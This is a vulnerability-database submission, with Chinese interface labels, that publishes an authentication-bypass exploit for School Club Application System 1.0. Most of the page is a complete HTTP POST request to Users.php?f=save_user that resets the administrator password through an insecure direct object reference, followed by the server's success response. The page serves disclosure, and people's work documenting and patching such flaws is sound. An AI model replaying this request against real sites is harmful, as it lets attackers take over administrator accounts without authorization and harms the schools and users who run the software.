提交 #34399: School Club Application System (SCAS) 1.0 - Authentication Bypass
| 标题 | School Club Application System (SCAS) 1.0 - Authentication Bypass |
|---|---|
| 描述 | # Exploit Title: School Club Application System (SCAS) 1.0 - Authentication Bypass # Date: 2022-04-09 # Exploit Author: Mr Empy # Software Link: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Linux Title: ================ School Club Application System (SCAS) 1.0 - Authentication Bypass Summary: ================ School Club Application System (SCAS) in version 1.0 is vulnerable to bypass authentication by changing administrator password by insecure direct object reference (IDOR) attack, for this reason, attacker can gain full access to administrator account by resetting its password. Severity Level: ================ 6.5 (Medium) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N Affected Product: ================ School Club Application System v1.0 Steps to Reproduce: ================ Request: POST /scas/classes/Users.php?f=save_user HTTP/1.1 Host: target.com Content-Length: 785 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOJM0GBfl6KS1ELuA Origin: http://target.com Referer: http://target.com/scas/admin/?page=manage_account Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="id" 1 ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="firstname" Administrator ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="middlename" ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="lastname" Admin ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="username" admin ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="password" H4ck3d@ ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryOJM0GBfl6KS1ELuA-- Response: HTTP/1.1 200 OK Date: Sat, 09 Apr 2022 15:16:38 GMT Server: Apache/2.4.52 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} |
| 来源 | ⚠️ https:/ |
| 用户 | mrempy (UID 24379) |
| 提交 | 2022-04-09 17時32分 (4 年前) |
| 管理 | 2022-04-09 20時16分 (3 hours later) |
| 状态 | 已接受 |
| VulDB条目 | 196750 [School Club Application System 1.0 Users.php?f=save_user 权限提升] |
| 积分 | 20 |